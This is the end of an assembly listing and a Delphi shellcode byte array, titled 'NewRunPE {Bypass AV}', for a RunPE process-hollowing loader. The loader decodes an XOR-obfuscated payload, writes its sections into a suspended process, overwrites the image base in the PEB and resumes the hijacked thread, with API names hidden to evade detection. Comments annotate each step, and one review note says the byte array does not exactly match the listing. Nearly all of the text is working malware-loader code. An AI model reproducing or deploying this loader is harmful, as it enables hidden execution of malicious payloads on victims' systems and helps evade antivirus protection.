; [EBP-8h] = address resolved for "VirtualProtectEx" ([EBP-0B1h]).
LEA EAX,DWORD PTR SS:[EBP-0B1h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV DWORD PTR SS:[EBP-8h],EAX
; Eight-entry DWORD table at [EBP-270h] of page-protection constants
; (1, 10h, 2, 20h, 4, 40h, 4, 40h). It is indexed in the loop by the top three
; bits of a section's Characteristics field.
MOV DWORD PTR SS:[EBP-270h],1h
MOV DWORD PTR SS:[EBP-26Ch],10h
MOV DWORD PTR SS:[EBP-268h],2h
MOV DWORD PTR SS:[EBP-264h],20h
MOV DWORD PTR SS:[EBP-260h],4h
MOV DWORD PTR SS:[EBP-25Ch],40h
MOV DWORD PTR SS:[EBP-258h],4h
MOV DWORD PTR SS:[EBP-254h],40h
; ESI = NumberOfSections (word at NT+6); the loop is skipped when it is 0.
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOVZX ESI,WORD PTR DS:[EAX+6h]
DEC ESI
TEST ESI,ESI
JL CheckReadP
INC ESI
; EBX = section index. EBX+EBX*4 scaled by 8 is EBX*40, the section header size.
XOR EBX,EBX
ReadRPLoop:
; WriteProcessMemory(process, child base + header+0Ch (VirtualAddress),
; buffer + header+14h (PointerToRawData), header+10h (SizeOfRawData), &[EBP-34h]).
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
ADD EAX,DWORD PTR SS:[EBP-54h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
ADD EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
; VirtualProtectEx(process, child base + VirtualAddress, header+8 (VirtualSize),
; table[header+24h (Characteristics) >> 29], old-protection output at [EBP-3Ch]).
LEA EAX,DWORD PTR SS:[EBP-3Ch]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
SHR EAX,1Dh
MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
PUSH EAX
LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
ADD EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-8h]
; Next section.
INC EBX
DEC ESI
JNZ ReadRPLoop
; CheckReadP: final stage of the hollowing sequence. Records the new image base
; in the child, redirects the suspended thread to the payload's entry point and
; resumes it. Locals used: [EBP-38h] base address in the child, [EBP-2Ch] payload
; NT headers, [EBP-250h] thread CONTEXT, [EBP-140h] / [EBP-13Ch] child process and
; thread handles. No return value is checked and the two handles are not closed
; in this listing.
; Analyst note: a write into another process's PEB followed by SetThreadContext
; and ResumeThread on a thread that was created suspended is the observable
; behaviour of this block.
CheckReadP:
; Call [EBP-0Ch] (resolved earlier for "WriteProcessMemory"): write the 4-byte
; value at [EBP-38h] to (context value at [EBP-1ACh]) + 8 in the child, the same
; address the image base was read from before the unmap.
LEA EAX,DWORD PTR SS:[EBP-34h]
PUSH EAX
PUSH 4h
LEA EAX,DWORD PTR SS:[EBP-38h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-1ACh]
ADD EAX,8h
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-140h]
PUSH EAX
CALL DWORD PTR SS:[EBP-0Ch]
; [EBP-1A0h] is offset 0B0h of the CONTEXT at [EBP-250h], the Eax slot in the
; 32-bit layout. It is set to child base + NT+28h (AddressOfEntryPoint).
MOV EAX,DWORD PTR SS:[EBP-2Ch]
MOV EAX,DWORD PTR DS:[EAX+28h]
ADD EAX,DWORD PTR SS:[EBP-38h]
MOV DWORD PTR SS:[EBP-1A0h],EAX
; EBX = address resolved for "SetThreadContext" ([EBP-0F8h]).
LEA EAX,DWORD PTR SS:[EBP-0F8h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; SetThreadContext(thread handle, &context).
LEA EAX,DWORD PTR SS:[EBP-250h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
; EBX = address resolved for "ResumeThread" ([EBP-105h]).
LEA EAX,DWORD PTR SS:[EBP-105h]
PUSH EAX
MOV EAX,DWORD PTR SS:[EBP-4h]
PUSH EAX
CALL DWORD PTR SS:[EBP-14h]
MOV EBX,EAX
; ResumeThread(thread handle).
MOV EAX,DWORD PTR SS:[EBP-13Ch]
PUSH EAX
CALL EBX
; Epilogue: restore the saved registers and frame; RETN 8 removes the two
; stdcall arguments (Buffer, BufferLen).
POP EDI
POP ESI
POP EBX
MOV ESP,EBP
POP EBP
RETN 8h
end start
Código en shellcode:
// Assembled byte form of the routine, as a Delphi byte-array constant: 95 rows of
// 25 bytes plus 2 bytes = 2377 bytes, matching the declared range 0..2376.
// NOTE(review): this array is not a byte-for-byte assembly of the MASM listing
// above it. After the two INC EAX bytes ($40,$40) it continues directly with
// $66,$8B,$08,$66,$83,$F9,$4B (load a 16-bit character, compare with 'K'), so the
// "Convert to UpperCase" block of the listing is absent here. Byte patterns taken
// from this array will therefore not match a binary assembled from the listing
// around that point, and vice versa.
// The API names are encoded as immediates of single-byte stores ($C6,$45,disp,char
// and $C6,$85,disp32,char), so they do not occur as contiguous text in the array.
// $34,$2A,$34,$87 is the pair of XOR instructions of the decode loop.
NewRunPE {Bypass AV} : array [0..2376] of Byte =
(
$55,$8B,$EC,$81,$C4,$88,$FC,$FF,$FF,$53,$56,$57,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,
$00,$8B,$00,$8B,$40,$28,$85,$C0,$66,$8B,$08,$66,$83,$F9,$00,$74,$04,$40,$40,$EB,$F3,$48,$48,$66,$8B,
$08,$66,$83,$F9,$5C,$74,$02,$EB,$F3,$40,$40,$66,$8B,$08,$66,$83,$F9,$4B,$75,$54,$66,$8B,$48,$02,$83,
$F9,$45,$75,$4B,$66,$8B,$48,$04,$83,$F9,$52,$75,$42,$66,$8B,$48,$06,$83,$F9,$4E,$75,$39,$66,$8B,$48,
$08,$83,$F9,$45,$75,$30,$66,$8B,$48,$0A,$83,$F9,$4C,$75,$27,$66,$8B,$48,$0C,$83,$F9,$33,$75,$1E,$66,
$8B,$48,$0E,$83,$F9,$32,$75,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,
$40,$18,$EB,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$00,$8B,$40,$18,
$89,$45,$FC,$C6,$45,$D8,$47,$C6,$45,$D9,$50,$C6,$45,$DA,$41,$33,$C0,$89,$45,$EC,$8B,$45,$FC,$8B,$40,
$3C,$03,$45,$FC,$8B,$50,$78,$89,$55,$BC,$8B,$50,$7C,$89,$55,$C0,$8B,$45,$FC,$03,$45,$BC,$8B,$70,$18,
$4E,$85,$F6,$72,$5C,$46,$33,$D2,$8B,$48,$20,$03,$4D,$FC,$8B,$DA,$C1,$E3,$02,$03,$CB,$8B,$79,$0C,$03,
$7D,$FC,$8A,$1F,$3A,$5D,$D8,$75,$3B,$8A,$5F,$03,$3A,$5D,$D9,$75,$33,$8A,$4F,$07,$3A,$4D,$DA,$75,$2B,
$8B,$48,$24,$03,$4D,$FC,$8B,$DA,$03,$DB,$03,$CB,$66,$8B,$09,$66,$83,$C1,$03,$8B,$40,$1C,$03,$45,$FC,
$0F,$B7,$C9,$C1,$E1,$02,$03,$C1,$8B,$30,$03,$75,$FC,$89,$75,$EC,$EB,$04,$42,$4E,$75,$A7,$C6,$45,$97,
$47,$C6,$45,$98,$65,$C6,$45,$99,$74,$C6,$45,$9A,$4D,$C6,$45,$9B,$6F,$C6,$45,$9C,$64,$C6,$45,$9D,$75,
$C6,$45,$9E,$6C,$C6,$45,$9F,$65,$C6,$45,$A0,$48,$C6,$45,$A1,$61,$C6,$45,$A2,$6E,$C6,$45,$A3,$64,$C6,
$45,$A4,$6C,$C6,$45,$A5,$65,$C6,$45,$A6,$41,$C6,$45,$A7,$00,$C6,$45,$84,$47,$C6,$45,$85,$65,$C6,$45,
$86,$74,$C6,$45,$87,$4D,$C6,$45,$88,$6F,$C6,$45,$89,$64,$C6,$45,$8A,$75,$C6,$45,$8B,$6C,$C6,$45,$8C,
$65,$C6,$45,$8D,$46,$C6,$45,$8E,$69,$C6,$45,$8F,$6C,$C6,$45,$90,$65,$C6,$45,$91,$4E,$C6,$45,$92,$61,
$C6,$45,$93,$6D,$C6,$45,$94,$65,$C6,$45,$95,$41,$C6,$45,$96,$00,$C6,$85,$6F,$FF,$FF,$FF,$5A,$C6,$85,
$70,$FF,$FF,$FF,$77,$C6,$85,$71,$FF,$FF,$FF,$55,$C6,$85,$72,$FF,$FF,$FF,$6E,$C6,$85,$73,$FF,$FF,$FF,
$6D,$C6,$85,$74,$FF,$FF,$FF,$61,$C6,$85,$75,$FF,$FF,$FF,$70,$C6,$85,$76,$FF,$FF,$FF,$56,$C6,$85,$77,
$FF,$FF,$FF,$69,$C6,$85,$78,$FF,$FF,$FF,$65,$C6,$85,$79,$FF,$FF,$FF,$77,$C6,$85,$7A,$FF,$FF,$FF,$4F,
$C6,$85,$7B,$FF,$FF,$FF,$66,$C6,$85,$7C,$FF,$FF,$FF,$53,$C6,$85,$7D,$FF,$FF,$FF,$65,$C6,$85,$7E,$FF,
$FF,$FF,$63,$C6,$85,$7F,$FF,$FF,$FF,$74,$C6,$45,$80,$69,$C6,$45,$81,$6F,$C6,$45,$82,$6E,$C6,$45,$83,
$00,$C6,$85,$60,$FF,$FF,$FF,$56,$C6,$85,$61,$FF,$FF,$FF,$69,$C6,$85,$62,$FF,$FF,$FF,$72,$C6,$85,$63,
$FF,$FF,$FF,$74,$C6,$85,$64,$FF,$FF,$FF,$75,$C6,$85,$65,$FF,$FF,$FF,$61,$C6,$85,$66,$FF,$FF,$FF,$6C,
$C6,$85,$67,$FF,$FF,$FF,$41,$C6,$85,$68,$FF,$FF,$FF,$6C,$C6,$85,$69,$FF,$FF,$FF,$6C,$C6,$85,$6A,$FF,
$FF,$FF,$6F,$C6,$85,$6B,$FF,$FF,$FF,$63,$C6,$85,$6C,$FF,$FF,$FF,$45,$C6,$85,$6D,$FF,$FF,$FF,$78,$C6,
$85,$6E,$FF,$FF,$FF,$00,$C6,$85,$4F,$FF,$FF,$FF,$56,$C6,$85,$50,$FF,$FF,$FF,$69,$C6,$85,$51,$FF,$FF,
$FF,$72,$C6,$85,$52,$FF,$FF,$FF,$74,$C6,$85,$53,$FF,$FF,$FF,$75,$C6,$85,$54,$FF,$FF,$FF,$61,$C6,$85,
$55,$FF,$FF,$FF,$6C,$C6,$85,$56,$FF,$FF,$FF,$50,$C6,$85,$57,$FF,$FF,$FF,$72,$C6,$85,$58,$FF,$FF,$FF,
$6F,$C6,$85,$59,$FF,$FF,$FF,$74,$C6,$85,$5A,$FF,$FF,$FF,$65,$C6,$85,$5B,$FF,$FF,$FF,$63,$C6,$85,$5C,
$FF,$FF,$FF,$74,$C6,$85,$5D,$FF,$FF,$FF,$45,$C6,$85,$5E,$FF,$FF,$FF,$78,$C6,$85,$5F,$FF,$FF,$FF,$00,
$C6,$85,$3D,$FF,$FF,$FF,$52,$C6,$85,$3E,$FF,$FF,$FF,$65,$C6,$85,$3F,$FF,$FF,$FF,$61,$C6,$85,$40,$FF,
$FF,$FF,$64,$C6,$85,$41,$FF,$FF,$FF,$50,$C6,$85,$42,$FF,$FF,$FF,$72,$C6,$85,$43,$FF,$FF,$FF,$6F,$C6,
$85,$44,$FF,$FF,$FF,$63,$C6,$85,$45,$FF,$FF,$FF,$65,$C6,$85,$46,$FF,$FF,$FF,$73,$C6,$85,$47,$FF,$FF,
$FF,$73,$C6,$85,$48,$FF,$FF,$FF,$4D,$C6,$85,$49,$FF,$FF,$FF,$65,$C6,$85,$4A,$FF,$FF,$FF,$6D,$C6,$85,
$4B,$FF,$FF,$FF,$6F,$C6,$85,$4C,$FF,$FF,$FF,$72,$C6,$85,$4D,$FF,$FF,$FF,$79,$C6,$85,$4E,$FF,$FF,$FF,
$00,$C6,$85,$2A,$FF,$FF,$FF,$57,$C6,$85,$2B,$FF,$FF,$FF,$72,$C6,$85,$2C,$FF,$FF,$FF,$69,$C6,$85,$2D,
$FF,$FF,$FF,$74,$C6,$85,$2E,$FF,$FF,$FF,$65,$C6,$85,$2F,$FF,$FF,$FF,$50,$C6,$85,$30,$FF,$FF,$FF,$72,
$C6,$85,$31,$FF,$FF,$FF,$6F,$C6,$85,$32,$FF,$FF,$FF,$63,$C6,$85,$33,$FF,$FF,$FF,$65,$C6,$85,$34,$FF,
$FF,$FF,$73,$C6,$85,$35,$FF,$FF,$FF,$73,$C6,$85,$36,$FF,$FF,$FF,$4D,$C6,$85,$37,$FF,$FF,$FF,$65,$C6,
$85,$38,$FF,$FF,$FF,$6D,$C6,$85,$39,$FF,$FF,$FF,$6F,$C6,$85,$3A,$FF,$FF,$FF,$72,$C6,$85,$3B,$FF,$FF,
$FF,$79,$C6,$85,$3C,$FF,$FF,$FF,$00,$C6,$85,$19,$FF,$FF,$FF,$47,$C6,$85,$1A,$FF,$FF,$FF,$65,$C6,$85,
$1B,$FF,$FF,$FF,$74,$C6,$85,$1C,$FF,$FF,$FF,$54,$C6,$85,$1D,$FF,$FF,$FF,$68,$C6,$85,$1E,$FF,$FF,$FF,
$72,$C6,$85,$1F,$FF,$FF,$FF,$65,$C6,$85,$20,$FF,$FF,$FF,$61,$C6,$85,$21,$FF,$FF,$FF,$64,$C6,$85,$22,
$FF,$FF,$FF,$43,$C6,$85,$23,$FF,$FF,$FF,$6F,$C6,$85,$24,$FF,$FF,$FF,$6E,$C6,$85,$25,$FF,$FF,$FF,$74,
$C6,$85,$26,$FF,$FF,$FF,$65,$C6,$85,$27,$FF,$FF,$FF,$78,$C6,$85,$28,$FF,$FF,$FF,$74,$C6,$85,$29,$FF,
$FF,$FF,$00,$C6,$85,$08,$FF,$FF,$FF,$53,$C6,$85,$09,$FF,$FF,$FF,$65,$C6,$85,$0A,$FF,$FF,$FF,$74,$C6,
$85,$0B,$FF,$FF,$FF,$54,$C6,$85,$0C,$FF,$FF,$FF,$68,$C6,$85,$0D,$FF,$FF,$FF,$72,$C6,$85,$0E,$FF,$FF,
$FF,$65,$C6,$85,$0F,$FF,$FF,$FF,$61,$C6,$85,$10,$FF,$FF,$FF,$64,$C6,$85,$11,$FF,$FF,$FF,$43,$C6,$85,
$12,$FF,$FF,$FF,$6F,$C6,$85,$13,$FF,$FF,$FF,$6E,$C6,$85,$14,$FF,$FF,$FF,$74,$C6,$85,$15,$FF,$FF,$FF,
$65,$C6,$85,$16,$FF,$FF,$FF,$78,$C6,$85,$17,$FF,$FF,$FF,$74,$C6,$85,$18,$FF,$FF,$FF,$00,$C6,$85,$FB,
$FE,$FF,$FF,$52,$C6,$85,$FC,$FE,$FF,$FF,$65,$C6,$85,$FD,$FE,$FF,$FF,$73,$C6,$85,$FE,$FE,$FF,$FF,$75,
$C6,$85,$FF,$FE,$FF,$FF,$6D,$C6,$85,$00,$FF,$FF,$FF,$65,$C6,$85,$01,$FF,$FF,$FF,$54,$C6,$85,$02,$FF,
$FF,$FF,$68,$C6,$85,$03,$FF,$FF,$FF,$72,$C6,$85,$04,$FF,$FF,$FF,$65,$C6,$85,$05,$FF,$FF,$FF,$61,$C6,
$85,$06,$FF,$FF,$FF,$64,$C6,$85,$07,$FF,$FF,$FF,$00,$C6,$45,$E2,$6E,$C6,$45,$E3,$74,$C6,$45,$E4,$64,
$C6,$45,$E5,$6C,$C6,$45,$E6,$6C,$C6,$45,$E7,$00,$C6,$85,$EC,$FE,$FF,$FF,$43,$C6,$85,$ED,$FE,$FF,$FF,
$72,$C6,$85,$EE,$FE,$FF,$FF,$65,$C6,$85,$EF,$FE,$FF,$FF,$61,$C6,$85,$F0,$FE,$FF,$FF,$74,$C6,$85,$F1,
$FE,$FF,$FF,$65,$C6,$85,$F2,$FE,$FF,$FF,$50,$C6,$85,$F3,$FE,$FF,$FF,$72,$C6,$85,$F4,$FE,$FF,$FF,$6F,
$C6,$85,$F5,$FE,$FF,$FF,$63,$C6,$85,$F6,$FE,$FF,$FF,$65,$C6,$85,$F7,$FE,$FF,$FF,$73,$C6,$85,$F8,$FE,
$FF,$FF,$73,$C6,$85,$F9,$FE,$FF,$FF,$41,$C6,$85,$FA,$FE,$FF,$FF,$00,$C6,$85,$DF,$FE,$FF,$FF,$4C,$C6,
$85,$E0,$FE,$FF,$FF,$6F,$C6,$85,$E1,$FE,$FF,$FF,$61,$C6,$85,$E2,$FE,$FF,$FF,$64,$C6,$85,$E3,$FE,$FF,
$FF,$4C,$C6,$85,$E4,$FE,$FF,$FF,$69,$C6,$85,$E5,$FE,$FF,$FF,$62,$C6,$85,$E6,$FE,$FF,$FF,$72,$C6,$85,
$E7,$FE,$FF,$FF,$61,$C6,$85,$E8,$FE,$FF,$FF,$72,$C6,$85,$E9,$FE,$FF,$FF,$79,$C6,$85,$EA,$FE,$FF,$FF,
$41,$C6,$85,$EB,$FE,$FF,$FF,$00,$8D,$85,$DF,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$E8,
$8B,$75,$0C,$4E,$85,$F6,$7C,$17,$46,$33,$DB,$8B,$45,$08,$8A,$04,$03,$34,$2A,$34,$87,$8B,$55,$08,$88,
$04,$13,$43,$4E,$75,$EC,$8B,$45,$08,$89,$45,$AC,$8D,$45,$97,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,
$8D,$45,$84,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$F0,$6A,$69,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,
$D3,$50,$FF,$D6,$8D,$85,$7C,$FE,$FF,$FF,$BB,$43,$00,$00,$00,$C6,$04,$03,$00,$4B,$83,$FB,$FF,$75,$F6,
$C7,$85,$7C,$FE,$FF,$FF,$44,$00,$00,$00,$8D,$85,$EC,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,
$D8,$8D,$85,$C0,$FE,$FF,$FF,$50,$8D,$85,$7C,$FE,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,$6A,$00,$6A,$00,
$6A,$00,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,$D3,$8D,$85,$19,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,
$55,$EC,$8B,$D8,$C7,$85,$B0,$FD,$FF,$FF,$07,$00,$01,$00,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,
$FF,$FF,$50,$FF,$D3,$8D,$85,$3D,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8D,$45,$D0,$50,
$6A,$04,$8D,$45,$C8,$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,
$8D,$85,$6F,$FF,$FF,$FF,$50,$8D,$45,$E2,$50,$FF,$55,$E8,$50,$FF,$55,$EC,$8B,$D8,$8B,$45,$C8,$50,$8B,
$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$8B,$45,$AC,$8B,$40,$3C,$03,$45,$AC,$89,$45,$D4,$8D,$85,$60,$FF,$FF,
$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$6A,$40,$68,$00,$30,$00,$00,$8B,$45,$D4,$8B,$40,$50,$50,
$8B,$45,$D4,$8B,$40,$34,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$89,$45,$C8,$8D,$85,$2A,$FF,$FF,$FF,
$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F4,$8D,$45,$CC,$50,$8B,$45,$D4,$8B,$40,$54,$50,$8B,$45,$AC,
$50,$8B,$45,$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8D,$78,$18,$8B,$45,$D4,$0F,
$B7,$40,$14,$03,$F8,$8D,$85,$4F,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F8,$C7,$85,$90,
$FD,$FF,$FF,$01,$00,$00,$00,$C7,$85,$94,$FD,$FF,$FF,$10,$00,$00,$00,$C7,$85,$98,$FD,$FF,$FF,$02,$00,
$00,$00,$C7,$85,$9C,$FD,$FF,$FF,$20,$00,$00,$00,$C7,$85,$A0,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$A4,
$FD,$FF,$FF,$40,$00,$00,$00,$C7,$85,$A8,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$AC,$FD,$FF,$FF,$40,$00,
$00,$00,$8B,$45,$D4,$0F,$B7,$70,$06,$4E,$85,$F6,$7C,$66,$46,$33,$DB,$8D,$45,$CC,$50,$8D,$04,$9B,$8B,
$44,$C7,$10,$50,$8D,$04,$9B,$8B,$44,$C7,$14,$03,$45,$AC,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,$C8,
$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8D,$45,$C4,$50,$8D,$04,$9B,$8B,$44,$C7,$24,$C1,$E8,$1D,
$8B,$84,$85,$90,$FD,$FF,$FF,$50,$8D,$04,$9B,$8B,$44,$C7,$08,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,
$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F8,$43,$4E,$75,$9D,$8D,$45,$CC,$50,$6A,$04,$8D,$45,$C8,
$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8B,
$40,$28,$03,$45,$C8,$89,$85,$60,$FE,$FF,$FF,$8D,$85,$08,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,
$8B,$D8,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$8D,$85,$FB,$FE,$FF,$FF,$50,
$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$5F,$5E,$5B,$8B,$E5,$5D,$C2,
$08,$00
);